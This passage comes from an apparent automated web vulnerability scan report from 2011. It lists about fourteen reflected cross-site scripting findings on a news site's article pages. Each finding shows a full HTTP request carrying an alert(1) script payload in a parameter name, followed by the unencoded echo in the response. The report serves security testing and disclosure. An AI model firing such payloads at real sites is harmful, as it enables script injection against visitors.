Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 58421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   'I think h
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116706579.html?53cb9"><script>alert(1)</script>51a8b418a42=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.44. http://www.komonews.com/news/local/116707379.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116707379.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4abb"><script>alert(1)</script>1481598e616 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116707379.html?e4abb"><script>alert(1)</script>1481598e616=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 61154

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Tuba Man k
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116707379.html?e4abb"><script>alert(1)</script>1481598e616=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.45. http://www.komonews.com/news/local/116712649.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116712649.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ccc"><script>alert(1)</script>185c63b8fe2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116712649.html?93ccc"><script>alert(1)</script>185c63b8fe2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:43 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53722

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Wash. bill
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116712649.html?93ccc"><script>alert(1)</script>185c63b8fe2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.46. http://www.komonews.com/news/local/116714899.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116714899.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7aad0"><script>alert(1)</script>aabf954c4e2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116714899.html?7aad0"><script>alert(1)</script>aabf954c4e2=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u7-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Gay lawmak
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116714899.html?7aad0"><script>alert(1)</script>aabf954c4e2=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.47. http://www.komonews.com/news/local/116727124.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116727124.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6b481"><script>alert(1)</script>23228f2d5e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116727124.html?6b481"><script>alert(1)</script>23228f2d5e=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 63488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Snow begin
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116727124.html?6b481"><script>alert(1)</script>23228f2d5e=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.48. http://www.komonews.com/news/local/116745309.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116745309.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14dfb"><script>alert(1)</script>64fe1ebf191 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116745309.html?14dfb"><script>alert(1)</script>64fe1ebf191=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b7
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56554

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   No freedom
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116745309.html?14dfb"><script>alert(1)</script>64fe1ebf191=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.49. http://www.komonews.com/news/local/116752479.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116752479.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7da8"><script>alert(1)</script>0858a8ba4ab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116752479.html?c7da8"><script>alert(1)</script>0858a8ba4ab=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r1-u24-b6
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:33 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 53652

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Overturned
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116752479.html?c7da8"><script>alert(1)</script>0858a8ba4ab=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.50. http://www.komonews.com/news/local/116755469.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/local/116755469.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a016a"><script>alert(1)</script>eedbf6babab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/local/116755469.html?a016a"><script>alert(1)</script>eedbf6babab=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: dv-c1-r2-u24-b14
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55643

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   High-speed
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/local/116755469.html?a016a"><script>alert(1)</script>eedbf6babab=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.51. http://www.komonews.com/news/national/115640079.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/115640079.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5920"><script>alert(1)</script>347bc1c610 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/115640079.html?b5920"><script>alert(1)</script>347bc1c610=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 55978

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Pregnant w
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/115640079.html?b5920"><script>alert(1)</script>347bc1c610=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.52. http://www.komonews.com/news/national/116404039.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116404039.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49972"><script>alert(1)</script>1d3733e8d04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116404039.html?49972"><script>alert(1)</script>1d3733e8d04=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 60209

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Man held o
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116404039.html?49972"><script>alert(1)</script>1d3733e8d04=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.53. http://www.komonews.com/news/national/116502428.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116502428.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a05a6"><script>alert(1)</script>ef92945c33c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116502428.html?a05a6"><script>alert(1)</script>ef92945c33c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57722

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Iowa girl
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116502428.html?a05a6"><script>alert(1)</script>ef92945c33c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.54. http://www.komonews.com/news/national/116713504.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116713504.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ceb2"><script>alert(1)</script>089115a8881 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116713504.html?5ceb2"><script>alert(1)</script>089115a8881=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 57248

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Dems leave
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116713504.html?5ceb2"><script>alert(1)</script>089115a8881=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.55. http://www.komonews.com/news/national/116734714.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116734714.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd604"><script>alert(1)</script>91f36b20a5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116734714.html?dd604"><script>alert(1)</script>91f36b20a5c=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 58164

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Pirates ma
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116734714.html?dd604"><script>alert(1)</script>91f36b20a5c=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.56. http://www.komonews.com/news/national/116736489.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116736489.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac900"><script>alert(1)</script>52506779f42 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116736489.html?ac900"><script>alert(1)</script>52506779f42=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u22-b5
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: click_mobile=0
Content-Length: 56584

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:fb="http://facebook.com/2008/fbml">
<head>
<title>


                                   Report: Ex
...[SNIP]...
<a name="fb_share" type="box_count" share_url="http://www.komonews.com/news/national/116736489.html?ac900"><script>alert(1)</script>52506779f42=1" href="http://www.facebook.com/sharer.php">
...[SNIP]...

1.57. http://www.komonews.com/news/national/116736624.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.komonews.com
Path:	/news/national/116736624.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49136"><script>alert(1)</script>43c868099eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /news/national/116736624.html?49136"><script>alert(1)</script>43c868099eb=1 HTTP/1.1
Host: www.komonews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: click_mobile=0; __gads=ID=fb409a40cfdb27ca:T=1298497019:S=ALNI_MZ18Qu30UeFAwl_7XbivFuKSXIyQg; __utmz=215150093.1298497003.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); dsnslfpop=1298756207170; __utma=215150093.758392942.1298497003.1298497003.1298497003.1; _vaHC=holdout=false; _vaEngT=1298496998074=10493; __utmc=215150093; _vaTC=uuid=db5fdb52-b687-4958-8cec-e4618ad7c232&cId=hdzFu7&track=true&sendSess=false&seq=3&intEngTimeReport=15000&lastAccess=1298497090922; __utmb=215150093.7.9.1298497088476;

Response

HTTP/1.1 200 OK
Server: Apache
X-Server-Name: sj-c14-r8-u38-b3
Content-Type: text/html;charset=utf-8
Date: Wed, 23 Feb 2011 22:12:55 GMT
